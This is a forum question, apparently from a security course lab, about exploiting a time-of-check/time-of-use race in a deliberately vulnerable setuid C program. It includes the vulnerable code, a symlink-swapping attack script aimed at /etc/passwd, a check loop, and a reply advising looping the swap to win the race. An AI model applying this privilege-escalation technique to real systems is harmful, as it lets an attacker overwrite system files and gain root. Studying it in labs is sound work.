# Exploiting concurrency vulnerability on a locked file UBUNTU SEED

Tags: c, linux, shell, security

For an assignment I have to see how I can use concurrency to open a locked file.

I have the program

```
    /*  vulp.c  */

    #include <stdio.h>
    #include <unistd.h>


    int main()
    {
       char * fn = "/tmp/XYZ";
       char buffer[60];
       FILE *fp;

       /* get user input */
       scanf("%50s", buffer );

       if(!access(fn, W_OK)){

            fp = fopen(fn, "a+");
            fwrite("\n", sizeof(char), 1, fp);
            fwrite(buffer, sizeof(char), strlen(buffer), fp);
            fclose(fp);
       }
       else printf("No permission \n");
    }
```

which I lock it using

```
sudo chown root vulp
sudo chmod 4755 vulp
```

I know that I should somehow delete /tmp/XYZ in order to gain ?access/overwrite? so that I can open the file. I have 2 shells that I run for passwd and shadow in order to overwrite, but it doesn't seem to work.

attack.sh

```
#!/bin/sh
ln -sf /home/seed/vulp /tmp/XYZ
ln -sf /etc/passwd /tmp/XYZ
```

check.sh

```
#!/bin/sh


old=`ls -l /etc/shadow`
new=`ls -l /etc/passwd`
while [ "$old" = "$new" ]
do
    ./vulp < passwd_input
    new=`ls -l /etc/passwd`

    counter=`expr $counter + 1`
done

echo "STOP... The shadow file has been changed"
echo "Total number of loops: $counter"
echo "STOP... The passwd file has been changed"
```

I run them in parallel on a terminal with the command

```
parallel -j 2 -- './check.sh' './attack,sh'
```

but I get "permission denied " each time.

I am not really sure what I am doing wrong or what is missing. Any help will be appreciated.

Comment: I'm voting to close this question as off-topic because I find it *suspicious.*  Locking strategies in Unix/Linux are generally called "advisory."  They're an indication to others that "you should not touch this," but do not necessarily prevent them from doing so.  (This is also partly a consequence of the many very-different file systems and networked file-systems that can be found in these environments.)

Comment: @MikeRobinson Just because a question is "suspicious" does not make it off-topic. Do you see "suspicious" anywhere in https://stackoverflow.com/help? It might be off-topic for "no minimal, reproducible example" but not for being "suspicious".

Comment: It's an assignment  for a security class  am taking at my University, but unlike the other assignments it's not clearly specifies what the steps are to do it and due to covid-19 I can't directly ask my teacher what I am doing wrong because my uni shutdown

Comment: This is all the information I have, I too don't have a minimal reproducing example or model to guide after. Not really sure what I can add to it.

Comment: I think your use of the word "locked" is causing confusion, since your question is unrelated to [file locking](https://gavv.github.io/articles/file-locks/).

Comment: But I use chown and chmod to try to defend it against writing or reading? so isn't that locked?

Comment: The problem is rather simple: you must *loop* the `ln -sf /home/seed/vulp /tmp/XYZ
ln -sf /etc/passwd /tmp/XYZ`. And to maximize the efficiency you should write a *C* program to do that, or at least Python! There is nothing else, you just want to make sure that the probability of having the switch between those two system calls would be maximal.